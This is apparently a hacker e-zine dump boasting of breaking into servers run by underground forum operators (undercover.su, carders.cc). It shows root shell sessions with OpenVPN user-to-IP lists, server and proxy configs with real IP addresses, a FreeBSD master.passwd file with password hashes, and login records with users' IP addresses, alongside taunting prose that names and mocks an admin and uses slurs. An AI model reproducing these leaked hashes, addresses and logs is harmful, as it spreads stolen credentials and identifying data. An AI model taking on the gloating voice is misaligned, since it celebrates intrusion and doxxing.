tar cfz $fn $user.crt $user.key ca.crt ${user}_OVPN.ovpn
mv $fn /var/www/
cd $dir
echo $fn
# cd /etc/openvpn/ && ls -la
total 48
drwxr-xr-x 4 root root 4096 Sep 17 03:20 .
drwxr-xr-x 70 root root 4096 Jan 7 19:07 ..
drwxr-xr-x 2 root root 4096 May 9 2010 certs
-rw-r--r-- 1 root root 3427 May 9 2010 client.conf
drwxr-xr-x 4 root root 4096 May 9 2010 easy-rsa
-rw------- 1 root root 1187 Jan 7 21:44 ipp.txt
---------- 1 root root 356 May 12 2010 openvpn-status.log
---------- 1 root root 160 May 18 2010 openvpn.log
-rw-r--r-- 1 root root 10388 Aug 9 23:09 server.conf
-rw------- 1 root root 0 May 18 2010 status.log
-rwxr-xr-x 1 root root 1352 Sep 18 2008 update-resolv-conf
# cat ipp.txt
Dukeraider,10.8.0.4
WEEDtwo,10.8.0.8
elektro,10.8.0.12
21Kms,10.8.0.16
darkt0wn,10.8.0.20
hi,10.8.0.24
w333d,10.8.0.28
SleepyHollow,10.8.0.32
HonigMelone,10.8.0.36
SmileNike,10.8.0.40
becks,10.8.0.44
sunrise,10.8.0.48
papa42,10.8.0.52
malakas2,10.8.0.56
Fahne,10.8.0.60
freshestman,10.8.0.64
kobra,10.8.0.68
Thunder0,10.8.0.72
juden,10.8.0.76
b7231,10.8.0.80
mablutze,10.8.0.84
Kerber0s,10.8.0.88
Loader,10.8.0.92
latestnews,10.8.0.96
Sa1nt8564,10.8.0.100
SilverFox,10.8.0.104
nate23,10.8.0.108
pan1c,10.8.0.112
Ginal406,10.8.0.116
Mantis70,10.8.0.120
kstARRR,10.8.0.124
h3l0x,10.8.0.128
reideen,10.8.0.132
conviction,10.8.0.136
awesome,10.8.0.140
recoilcontrol,10.8.0.144
jack123,10.8.0.148
chiller1337,10.8.0.152
hung2304,10.8.0.156
Tiberius,10.8.0.160
Kolumbus,10.8.0.164
Delphinko,10.8.0.168
McKnad,10.8.0.172
Kamill,10.8.0.176
kevin4ual,10.8.0.180
SleepyHollow,10.8.0.184
N3v10,10.8.0.188
shore,10.8.0.192
kingpok,10.8.0.196
xStream,10.8.0.200
Kasanova,10.8.0.204
andreas7411,10.8.0.208
slic3menic3,10.8.0.212
FaxXer,10.8.0.216
Pitbull69,10.8.0.220
b1111,10.8.0.224
obama123,10.8.0.228
Alanka,10.8.0.232
oicw91,10.8.0.236
weeman,10.8.0.240
fuckdawn,10.8.0.244
docscanner,10.8.0.248
# cat server.conf
#################################################
# Sample OpenVPN 2.0 config file for #
# multi-client server. #
# #
# This file is for the server side #
# of a many-clients <-> one-server #
# OpenVPN configuration. #
# #
# OpenVPN also supports #
# single-machine <-> single-machine #
# configurations (See the Examples page #
# on the web site for more info). #
# #
# This config should work on Windows #
# or Linux/BSD systems. Remember on #
# Windows to quote pathnames and use #
# double backslashes, e.g.: #
# "C:\\Program Files\\OpenVPN\\config\\foo.key" #
# #
# Comments are preceded with '#' or ';' #
#################################################
# Which local IP address should OpenVPN
# listen on? (optional)
;local a.b.c.d
# Which TCP/UDP port should OpenVPN listen on?
# If you want to run multiple OpenVPN instances
# on the same machine, use a different port
# number for each one. You will need to
# open up this port on your firewall.
port 1194
# TCP or UDP server?
;proto tcp
proto udp
# "dev tun" will create a routed IP tunnel,
# "dev tap" will create an ethernet tunnel.
# Use "dev tap0" if you are ethernet bridging
# and have precreated a tap0 virtual interface
# and bridged it with your ethernet interface.
# If you want to control access policies
# over the VPN, you must create firewall
# rules for the the TUN/TAP interface.
# On non-Windows systems, you can give
# an explicit unit number, such as tun0.
# On Windows, use "dev-node" for this.
# On most systems, the VPN will not function
# unless you partially or fully disable
# the firewall for the TUN/TAP interface.
;dev tap
dev tun
# Windows needs the TAP-Win32 adapter name
# from the Network Connections panel if you
# have more than one. On XP SP2 or higher,
# you may need to selectively disable the
# Windows firewall for the TAP adapter.
# Non-Windows systems usually don't need this.
;dev-node MyTap
# SSL/TLS root certificate (ca), certificate
# (cert), and private key (key). Each client
# and the server must have their own cert and
# key file. The server and all clients will
# use the same ca file.
#
# See the "easy-rsa" directory for a series
# of scripts for generating RSA certificates
# and private keys. Remember to use
# a unique Common Name for the server
# and each of the client certificates.
#
# Any X509 key management system can be used.
# OpenVPN can also use a PKCS #12 formatted key file
# (see "pkcs12" directive in man page).
ca certs/ca.crt
cert certs/server.crt
key certs/server.key # This file should be kept secret
# Diffie hellman parameters.
# Generate your own with:
# openssl dhparam -out dh1024.pem 1024
# Substitute 2048 for 1024 if you are using
# 2048 bit keys.
dh certs/dh1024.pem
# Configure server mode and supply a VPN subnet
# for OpenVPN to draw client addresses from.
# The server will take 10.8.0.1 for itself,
# the rest will be made available to clients.
# Each client will be able to reach the server
# on 10.8.0.1. Comment this line out if you are
# ethernet bridging. See the man page for more info.
server 10.8.0.0 255.255.255.0
# Maintain a record of client <-> virtual IP address
# associations in this file. If OpenVPN goes down or
# is restarted, reconnecting clients can be assigned
# the same virtual IP address from the pool that was
# previously assigned.
ifconfig-pool-persist ipp.txt
# Configure server mode for ethernet bridging.
# You must first use your OS's bridging capability
# to bridge the TAP interface with the ethernet
# NIC interface. Then you must manually set the
# IP/netmask on the bridge interface, here we
# assume 10.8.0.4/255.255.255.0. Finally we
# must set aside an IP range in this subnet
# (start=10.8.0.50 end=10.8.0.100) to allocate
# to connecting clients. Leave this line commented
# out unless you are ethernet bridging.
;server-bridge 10.8.0.4 255.255.255.0 10.8.0.50 10.8.0.100
# Configure server mode for ethernet bridging
# using a DHCP-proxy, where clients talk
# to the OpenVPN server-side DHCP server
# to receive their IP address allocation
# and DNS server addresses. You must first use
# your OS's bridging capability to bridge the TAP
# interface with the ethernet NIC interface.
# Note: this mode only works on clients (such as
# Windows), where the client-side TAP adapter is
# bound to a DHCP client.
;server-bridge
# Push routes to the client to allow it
# to reach other private subnets behind
# the server. Remember that these
# private subnets will also need
# to know to route the OpenVPN client
# address pool (10.8.0.0/255.255.255.0)
# back to the OpenVPN server.
;push "route 192.168.10.0 255.255.255.0"
;push "route 192.168.20.0 255.255.255.0"
# To assign specific IP addresses to specific
# clients or if a connecting client has a private
# subnet behind it that should also have VPN access,
# use the subdirectory "ccd" for client-specific
# configuration files (see man page for more info).
# EXAMPLE: Suppose the client
# having the certificate common name "Thelonious"
# also has a small subnet behind his connecting
# machine, such as 192.168.40.128/255.255.255.248.
# First, uncomment out these lines:
;client-config-dir ccd
;route 192.168.40.128 255.255.255.248
# Then create a file ccd/Thelonious with this line:
# iroute 192.168.40.128 255.255.255.248
# This will allow Thelonious' private subnet to
# access the VPN. This example will only work
# if you are routing, not bridging, i.e. you are
# using "dev tun" and "server" directives.
# EXAMPLE: Suppose you want to give
# Thelonious a fixed VPN IP address of 10.9.0.1.
# First uncomment out these lines:
;client-config-dir ccd
;route 10.9.0.0 255.255.255.252
# Then add this line to ccd/Thelonious:
# ifconfig-push 10.9.0.1 10.9.0.2
# Suppose that you want to enable different
# firewall access policies for different groups
# of clients. There are two methods:
# (1) Run multiple OpenVPN daemons, one for each
# group, and firewall the TUN/TAP interface
# for each group/daemon appropriately.
# (2) (Advanced) Create a script to dynamically
# modify the firewall in response to access
# from different clients. See man
# page for more info on learn-address script.
;learn-address ./script
# If enabled, this directive will configure
# all clients to redirect their default
# network gateway through the VPN, causing
# all IP traffic such as web browsing and
# and DNS lookups to go through the VPN
# (The OpenVPN server machine may need to NAT
# or bridge the TUN/TAP interface to the internet
# in order for this to work properly).
push "redirect-gateway def1"
push "dhcp-option DNS 92.241.168.201"
# Certain Windows-specific network settings
# can be pushed to clients, such as DNS
# or WINS server addresses. CAVEAT:
# http://openvpn.net/faq.html#dhcpcaveats
# The addresses below refer to the public
# DNS servers provided by opendns.com.
;push "dhcp-option DNS 208.67.222.222"
;push "dhcp-option DNS 208.67.220.220"
# Uncomment this directive to allow different
# clients to be able to "see" each other.
# By default, clients will only see the server.
# To force clients to only see the server, you
# will also need to appropriately firewall the
# server's TUN/TAP interface.
;client-to-client
# Uncomment this directive if multiple clients
# might connect with the same certificate/key
# files or common names. This is recommended
# only for testing purposes. For production use,
# each client should have its own certificate/key
# pair.
#
# IF YOU HAVE NOT GENERATED INDIVIDUAL
# CERTIFICATE/KEY PAIRS FOR EACH CLIENT,
# EACH HAVING ITS OWN UNIQUE "COMMON NAME",
# UNCOMMENT THIS LINE OUT.
;duplicate-cn
# The keepalive directive causes ping-like
# messages to be sent back and forth over
# the link so that each side knows when
# the other side has gone down.
# Ping every 10 seconds, assume that remote
# peer is down if no ping received during
# a 120 second time period.
keepalive 10 120
# For extra security beyond that provided
# by SSL/TLS, create an "HMAC firewall"
# to help block DoS attacks and UDP port flooding.
#
# Generate with:
# openvpn --genkey --secret ta.key
#
# The server and each client must have
# a copy of this key.
# The second parameter should be '0'
# on the server and '1' on the clients.
;tls-auth ta.key 0 # This file is secret
# Select a cryptographic cipher.
# This config item must be copied to
# the client config file as well.
;cipher BF-CBC # Blowfish (default)
;cipher AES-128-CBC # AES
;cipher DES-EDE3-CBC # Triple-DES
# Enable compression on the VPN link.
# If you enable it here, you must also
# enable it in the client config file.
comp-lzo
# The maximum number of concurrently connected
# clients we want to allow.
;max-clients 100
# It's a good idea to reduce the OpenVPN
# daemon's privileges after initialization.
#
# You can uncomment this out on
# non-Windows systems.
;user nobody
;group nogroup
# The persist options will try to avoid
# accessing certain resources on restart
# that may no longer be accessible because
# of the privilege downgrade.
persist-key
persist-tun
# Output a short status file showing
# current connections, truncated
# and rewritten every minute.
status /dev/null
#status.log
# By default, log messages will go to the syslog (or
# on Windows, if running as a service, they will go to
# the "\Program Files\OpenVPN\log" directory).
# Use log or log-append to override this default.
# "log" will truncate the log file on OpenVPN startup,
# while "log-append" will append to it. Use one
# or the other (but not both).
log /dev/null
;log-append openvpn.log
# Set the appropriate level of log
# file verbosity.
#
# 0 is silent, except for fatal errors
# 4 is reasonable for general usage
# 5 and 6 can help to debug connection problems
# 9 is extremely verbose
verb 0
# Silence repeating messages. At most 20
# sequential messages of the same message
# category will be output to the log.
;mute 20
crl-verify /etc/openvpn/easy-rsa/2.0/keys/crl.pem
$ cat /etc/sockd.conf
# $Id: sockd.conf,v 1.49 2009/10/27 11:56:55 karls Exp $
#
# A sample sockd.conf
#
#
# The configfile is divided into three parts;
# 1) serversettings
# 2) rules
# 3) routes
#
# The recommended order is:
# Serversettings:
# logoutput
# internal
# external
# method
# clientmethod
# users
# compatibility
# extension
# timeout
# srchost
#
# Rules:
# client block/pass
# from to
# libwrap
# log
#
# block/pass
# from to
# method
# command
# libwrap
# log
# protocol
# proxyprotocol
#
# Routes:
# the server will log both via syslog, to stdout and to /var/log/lotsoflogs
#logoutput: syslog stdout /var/log/lotsoflogs
logoutput: /dev/null
# The server will bind to the address 10.1.1.1, port 1080 and will only
# accept connections going to that address.
internal: 92.241.190.253 port = 14421
# Alternatively, the interface name can be used instead of the address.
#internal: eth0 port = 1080
# all outgoing connections from the server will use the IP address
# 195.168.1.1
external: 92.241.190.253
# list over acceptable methods, order of preference.
# A method not set here will never be selected.
#
# If the method field is not set in a rule, the global
# method is filled in for that rule.
#
# methods for socks-rules.
method: username
#none #rfc931
# methods for client-rules.
#clientmethod: none
#or if you want to allow rfc931 (ident) too
#method: username rfc931 none
#or for PAM authentification
#method: pam
#
# User identities, an important section.
#
# when doing something that can require privilege, it will use the
# userid "sockd".
#user.privileged: sockd
# when running as usual, it will use the unprivileged userid of "sockd".
#user.unprivileged: sockd
# If you compiled with libwrap support, what userid should it use
# when executing your libwrap commands? "libwrap".
#user.libwrap: libwrap
#
# Some options to help clients with compatibility:
#
# when a client connection comes in the socksserver will try to use
# the same port as the client is using, when the socksserver
# goes out on the clients behalf (external: IP address).
# If this option is set, Dante will try to do it for reserved ports aswell.
# This will usually require user.privileged to be set to "root".
#compatibility: sameport
# If you are using the bind extension and have trouble running servers
# via the server, you might try setting this. The consequences of it
# are unknown.
#compatibility: reuseaddr
#
# The Dante server supports some extensions to the socks protocol.
# These require that the socks client implements the same extension and
# can be enabled using the "extension" keyword.
#
# enable the bind extension.
#extension: bind
#
# Misc options.
#
# how many seconds can pass from when a client connects til it has
# sent us it's request? Adjust according to your network performance
# and methods supported.
#timeout.negotiate: 30 # on a lan, this should be enough.
# how many seconds can the client and it's peer idle without sending
# any data before we dump it? Unless you disable tcp keep-alive for
# some reason, it's probably best to set this to 0, which is
# "forever".
timeout.io: 0 # or perhaps 86400, for a day.
# do you want to accept connections from addresses without
# dns info? what about addresses having a mismatch in dnsinfo?
#srchost: nounknown nomismatch
#
# The actual rules. There are two kinds and they work at different levels.
#
# The rules prefixed with "client" are checked first and say who is allowed
# and who is not allowed to speak/connect to the server. I.e the
# ip range containing possibly valid clients.
# It is especially important that these only use IP addresses, not hostnames,
# for security reasons.
#
# The rules that do not have a "client" prefix are checked later, when the
# client has sent its request and are used to evaluate the actual
# request.
#
# The "to:" in the "client" context gives the address the connection
# is accepted on, i.e the address the socksserver is listening on, or
# just "0.0.0.0/0" for any address the server is listening on.
#
# The "to:" in the non-"client" context gives the destination of the clients
# socksrequest.
#
# "from:" is the source address in both contexts.
#
#
# The "client" rules. All our clients come from the net 10.0.0.0/8.
#
# Allow our clients, also provides an example of the port range command.
client pass {
from: 0.0.0.0/0 port 1-65535 to: 0.0.0.0/0
#method: rfc931 # match all idented users that also are in passwordfile
}
# This is identical to above, but allows clients without a rfc931 (ident)
# too. In practise this means the socksserver will try to get a rfc931
# reply first (the above rule), if that fails, it tries this rule.
#client pass {
# from: 10.0.0.0/8 port 1-65535 to: 0.0.0.0/0
#}
# drop everyone else as soon as we can and log the connect, they are not
# on our net and have no business connecting to us. This is the default
# but if you give the rule yourself, you can specify details.
#client block {
# from: 0.0.0.0/0 to: 0.0.0.0/0
# log: connect error
#}
# the rules controlling what clients are allowed what requests
#
# you probably don't want people connecting to loopback addresses,
# who knows what could happen then.
#block {
# from: 0.0.0.0/0 to: lo0
# log: connect error
#}
# the people at the 172.16.0.0/12 are bad, no one should talk to them.
# log the connect request and also provide an example on how to
# interact with libwrap.
#block {
# from: 0.0.0.0/0 to: 172.16.0.0/12
# libwrap: spawn finger @%a
# log: connect error
#}
# unless you need it, you could block any bind requests.
#block {
# from: 0.0.0.0/0 to: 0.0.0.0/0
# command: bind
# log: connect error
#}
# or you might want to allow it, for instance "active" ftp uses it.
# Note that a "bindreply" command must also be allowed, it
# should usually by from "0.0.0.0/0", i.e if a client of yours
# has permission to bind, it will also have permission to accept
# the reply from anywhere.
pass {
from: 0.0.0.0/0 to: 0.0.0.0/0
# command: bind
# log: connect error
}
# some connections expect some sort of "reply", this might be
# the reply to a bind request or it may be the reply to a
# udppacket, since udp is packetbased.
# Note that nothing is done to verify that it's a "genuine" reply,
# that is in general not possible anyway. The below will allow
# all "replies" in to your clients at the 10.0.0.0/8 net.
#pass {
# from: 0.0.0.0/0 to: 10.0.0.0/8
# command: bindreply udpreply
# log: connect error
#}
# pass any http connects to the example.com domain if they
# authenticate with username.
# This matches "example.com" itself and everything ending in ".example.com".
#pass {
# from: 10.0.0.0/8 to: .example.com port = http
# log: connect error
# method: username
#}
# block any other http connects to the example.com domain.
#block {
# from: 0.0.0.0/0 to: .example.com port = http
# log: connect error
#}
# everyone from our internal network, 10.0.0.0/8 is allowed to use
# tcp and udp for everything else.
#pass {
# from: 10.0.0.0/8 to: 0.0.0.0/0
# protocol: tcp udp
#}
# last line, block everyone else. This is the default but if you provide
# one yourself you can specify your own logging/actions
#block {
# from: 0.0.0.0/0 to: 0.0.0.0/0
# log: connect error
#}
# route all http connects via an upstream socks server, aka "server-chaining".
#route {
# from: 10.0.0.0/8 to: 0.0.0.0/0 port = http via: socks.example.net port = socks
#}
All in all this really shouldn't surprise anyone. Carders.cc was told
to fuck off twice now and we're tired of cleaning their shit up.
Seriously, it's not a secret that carders.cc's team members are a bit
dim, though even they should have got the hint by now. Why don't you
go out, steal some handbags or whatever scum does at your age? This is
not only a warning to you but also to your users; don't put your trust
in admins that are that fucking incapable, because if you do, you will
be owned and your data will be exp0sed. - AGAIN -
,;~;,
/\_
( /
(() //)
| \\ ,,;;'\
__ _( )m=((((((((((((((========{ Undercover.su }======-------
/' ' '()/~' '.(, |
,;( )|| | ~ k!LLu, well, what can be said about him? He's
,;' \ /-(.;, ) probably the most attention-whoring and at the
) / ) / same time the most hated kid around. He spends
// || his time lurking around on kiddyboards, bragging
)_\ )_\ about his imaginary achievements and skills. He
changes his nickname more frequently than his underwear but usually
gets uncovered instantly due to his obtrusive arrogance and stupidity.
All in all he is hands-down the most annoying little brat around.
Clearly, this self-proclaimed hosting-pro and his most recent strokes
of genius "Secure-Host", "Undercover.su" and "Snap Reloaded" have to
be dealt with. k!LLu aka s1mpl3x aka purplera1n gave his best to make
his board ("application only") look more private and exclusive than a
dinner with the president. Probably this is why even Fukushima looks
crowded compared to undercover.su. But what can we say? He begged for
it so we owned him anyway; in fact we're presenting you all of his
"projects" torn to pieces.
____________________________________________________________________
| __ __ |
| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
| | _ | | | _ || _| -__|| _ | _ |_ _| |
| |__ |_____|_____||____|_____||_____|_____|__.__| |
|________|__|________________________________________________________|
| |
| k!LLu: erstens |
| k!LLu: entscheide ich ob es ein board gibt oder nich |
|____________________________________________________________________|
k!LLu decides if a messageboard exists or not! It's no secret that
he is a bit delusional and tends to get stuff mixed up. But, admit
it, his ramblings are kind of fun to read and we look forward to
seeing what he comes up with to explain him being owned and exposed.
___________________________________________________________________ _
| __ __ |
| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
| | _ | | | _ || _| -__|| _ | _ |_ _| |
| |__ |_____|_____||____|_____||_____|_____|__.__| |
|________|__|________________________________________________________|
| |
| k!LLu: profis ???? |
| LOOOOOOOOOL |
| |
| 1337Crew, Public lücke in der SB |
| Carders, Public lücke im SMF |
| Carders #2 , [0-day]24.12.2010 vbulletin 4.0p1Exploit |
| |
| scriptkiddys.... nothing serverside... |
| |
| wäre ich früher aufgestanden hätte dort undercover |
| gestanden :/ |
| |
| Die Admins sind einfach zu daemlich.... |
| Crimenetwork -- MostHated&Unhacked |
|____________________________________________________________________|
k!LLu basically says that 1337crew and carders.cc were hacked with
public exploits by amateurs. He would have done it himself if he
hadn't slept so long.
The main question here is whether he himself believes this bullshit.
But seriously, he can't be that dumb. Crimenetwork, the predecessor of
undercover.su, was destined to fail from the beginning since k!LLu has
always been trying to create the image of the knowledgeable hacker and
admin he clearly is not. To promote his projects he apparently doesn't
back off from talking about public vulnerabilities that never existed
or exploits he'd never get his hands on. It must be really depressing
to have never even seen or possesed a 0day when one is immensely
desperate to make others believe so. The sad thing actually is that
his constant lying is believed by people incapable of checking simple
facts. But just imagine this poor little guy trying to insult the
hackers who are just watching him typing it, failing to understand
that he is just one of many Trumans in our show. We hope that this
ezine can once and for all depict k!LLu as the cocky kid he is.
When trying not to puke while surfing Undercover.su we stumbled upon
some rumors. One of which stated that we are Global Evolution - a
private little German fag community that tries to explain security
vulnerabilities by blogging videos about XSS. No we're not Global
Evolution. If anything, we are evolution. We lend a hand to natural
selection, by helping to wipe out the weak ones. And, believe us or
not, k!LLu and his projects deserve to be wiped out more than anybody
or anything else. We keep the show going ...
# uname -a
FreeBSD 8.2-RELEASE-p3 #4: Thu Sep 29 14:54:55 MSD 2011
# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
# cat /etc/passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
ucsu:*:1002:1002:User &:/home/ucsu:/usr/local/bin/bash
true:*:1003:1003:User &:/home/true:/sbin/nologin
symb:*:1006:1006:User &:/home/symb:/bin/sh
hosting:*:1008:1008:User &:/home/hosting:/sbin/nologin
gtbros:*:1001:1001:User &:/home/gtbros:/sbin/nologin
relite:*:1007:1007:User &:/home/relite:/bin/sh
wayne:*:1004:1004:User &:/home/wayne:/sbin/nologin
ixde:*:1009:1009:User &:/home/ixde:/sbin/nologin
backspace:*:1005:1005:User &:/home/backspace:/bin/sh
lcf:*:1000:1000:User &:/home/lcf:/bin/sh
# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $
#
root:$1$bqzBFX0T$LkqVd6ktOTUX0qtY3W8fA1:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin
postfix:*:125:125::0:0:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
ucsu:$1$rkQkyHD4$SPar9t/apgqXI9iBUBSh/0:1002:1002::0:0:User &:/home/ucsu:/usr/local/bin/bash
true:$1$bWcK0H74$NTULoy82dfWaevrF2Hf.T/:1003:1003::0:0:User &:/home/true:/sbin/nologin
symb:$1$Lx5.ll9w$uMdF6FKqh4TuC5QuazVQ31:1006:1006::0:0:User &:/home/symb:/bin/sh
hosting:$1$ptOUAPmM$7N/IB1xCXt9x.ft34Dlk/.:1008:1008::0:0:User &:/home/hosting:/sbin/nologin
gtbros:$1$atXPT9B1$qNpYOTWDHlcis3ldbFSjg/:1001:1001::0:0:User &:/home/gtbros:/sbin/nologin
relite:$1$c7m4u7CP$P6QVZVnvxhIqvJRAoZ87j0:1007:1007::0:0:User &:/home/relite:/bin/sh
wayne:$1$SCxNrKiE$iA2K05rvKgbGW/yrdqlVn1:1004:1004::0:0:User &:/home/wayne:/sbin/nologin
ixde:$1$te1KzFVe$gRVE863DVX8QmLT.Tpsvp0:1009:1009::0:0:User &:/home/ixde:/sbin/nologin
backspace:$1$ZPiFb/ga$z0cTF3T8CV7m0guoYVsJJ/:1005:1005::0:0:User &:/home/backspace:/bin/sh
lcf:$1$85k5c7VQ$5nqIFiZbOBFD5Z9LTxmd1.:1000:1000::0:0:User &:/home/lcf:/bin/sh
# last
ixde ftp 94.220.134.71 Tue Oct 11 17:33 - 17:44 (00:10)
ixde ftp 85.17.97.27 Tue Oct 11 17:25 - 17:27 (00:01)
ixde ftp 85.17.97.27 Tue Oct 11 17:25 - 17:31 (00:06)
ixde ftp 94.220.134.71 Tue Oct 11 16:37 - 16:41 (00:04)
ixde ftp 94.220.134.71 Tue Oct 11 16:19 - 16:27 (00:07)
ucsu ftp 193.107.17.239 Tue Oct 11 11:31 - 11:32 (00:00)
ixde ftp 94.220.134.71 Mon Oct 10 15:44 - 15:48 (00:03)
ixde ftp 94.220.134.71 Sun Oct 9 20:42 - 20:47 (00:04)
ucsu ftp 77.20.18.64 Sat Oct 8 17:04 - 17:07 (00:03)
ucsu ftp 77.20.18.64 Sat Oct 8 12:57 - 13:00 (00:03)
ixde ftp 217.255.238.21 Fri Oct 7 14:18 - 14:21 (00:03)
ixde ftp 217.255.238.21 Fri Oct 7 14:01 - 14:06 (00:04)
ixde ftp 217.255.238.21 Fri Oct 7 13:56 - 13:58 (00:01)
ixde ftp 217.255.238.21 Fri Oct 7 13:54 - 13:55 (00:01)
ixde ftp 217.255.238.21 Fri Oct 7 13:54 - 13:57 (00:03)
ixde ftp 217.255.238.21 Fri Oct 7 13:51 - 13:52 (00:01)
ixde ftp 217.255.238.21 Fri Oct 7 13:49 - 13:52 (00:03)
ixde ftp 217.255.238.21 Fri Oct 7 13:47 - 13:48 (00:01)
ixde ftp 217.255.238.21 Fri Oct 7 13:45 - 13:48 (00:03)
ixde ftp 217.255.238.21 Fri Oct 7 13:44 - 13:45 (00:01)
ixde ftp 217.255.238.21 Fri Oct 7 13:42 - 13:44 (00:01)
ixde ftp 94.220.134.71 Fri Oct 7 13:40 - 13:46 (00:05)
ixde ftp 217.255.238.21 Fri Oct 7 13:39 - 13:45 (00:05)
backspace ftp 217.23.8.127 Wed Oct 5 11:34 - 11:59 (00:24)
ucsu ftp 77.20.18.64 Tue Oct 4 17:10 - 17:13 (00:03)
backspace ftp 95.128.242.224 Mon Oct 3 22:29 - 22:39 (00:10)
true ftp 77.20.18.64 Mon Oct 3 16:59 - 17:00 (00:01)
true ftp 77.20.18.64 Mon Oct 3 16:58 - 16:59 (00:01)
true ftp 77.20.18.64 Mon Oct 3 16:58 - 17:01 (00:03)
true ftp 77.20.18.64 Mon Oct 3 16:54 - 16:57 (00:03)
ixde ftp 94.220.134.71 Mon Oct 3 09:38 - 10:07 (00:29)
ixde ftp 94.220.134.71 Mon Oct 3 09:11 - 09:17 (00:05)
ixde ftp 94.220.134.71 Sun Oct 2 23:04 - 23:04 (00:00)
ixde ftp 94.220.134.71 Sun Oct 2 23:01 - 23:04 (00:03)
ixde ftp 94.220.134.71 Sun Oct 2 22:31 - 22:45 (00:13)
ixde ftp 94.220.134.71 Sun Oct 2 22:29 - 22:45 (00:15)
# host 77.20.18.64
64.18.20.77.in-addr.arpa domain name pointer 77-20-18-64-dynip.superkabel.de.
# there we go^C
# cd /home/ucsu
# ls -la
total 32
drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .
drwxr-x--x 13 root wheel 512 Sep 22 21:06 ..
drwxrwx--- 2 ucsu www 512 May 6 13:08 abuse.undercover.su
drwxrwx--- 2 ucsu www 512 Aug 16 00:12 delict.cc
drwxrwx--- 2 ucsu www 512 Apr 13 13:04 moneymake.us
drwxrwx--- 3 ucsu www 512 Apr 7 2011 scene-sector.to
drwxrwx--- 2 ucsu www 2048 Oct 11 19:57 temp
drwxrwx--- 10 ucsu www 1024 Oct 8 17:04 undercover.su
# cd abuse.undercover.su
# ls -la
total 12
drwxrwx--- 2 ucsu www 512 May 6 13:08 .
drwxr-x--- 8 ucsu www 512 Aug 16 17:06 ..
-rw-r--r-- 1 ucsu www 1034 May 6 13:08 index.html
# cd ..
# cd delict.cc
# ls -la
total 100
drwxrwx--- 2 ucsu www 512 Aug 16 00:12 .
drwxr-x--- 8 ucsu www 512 Aug 16 17:06 ..
-rw-r--r-- 1 ucsu www 423 Aug 15 23:46 index.php
-rw-r--r-- 1 ucsu www 44909 Aug 16 00:12 mainlogo.png
# cd ..
# cd moneymake.us
# ls -la
total 12
drwxrwx--- 2 ucsu www 512 Apr 13 13:04 .
drwxr-x--- 8 ucsu www 512 Aug 16 17:06 ..
-rw-r--r-- 1 root www 261 Apr 13 13:04 index.php
# cat index.php
<html>
<head>
<title>Undercover.SU</title>
<meta http-equiv="Content-type" content="text/html; charset=iso-8859-1">
<meta http-equiv="refresh" content="0; URL=http://undercover.su/ipboard/">
</head>
<body>
Sie werden weitergeleitet...
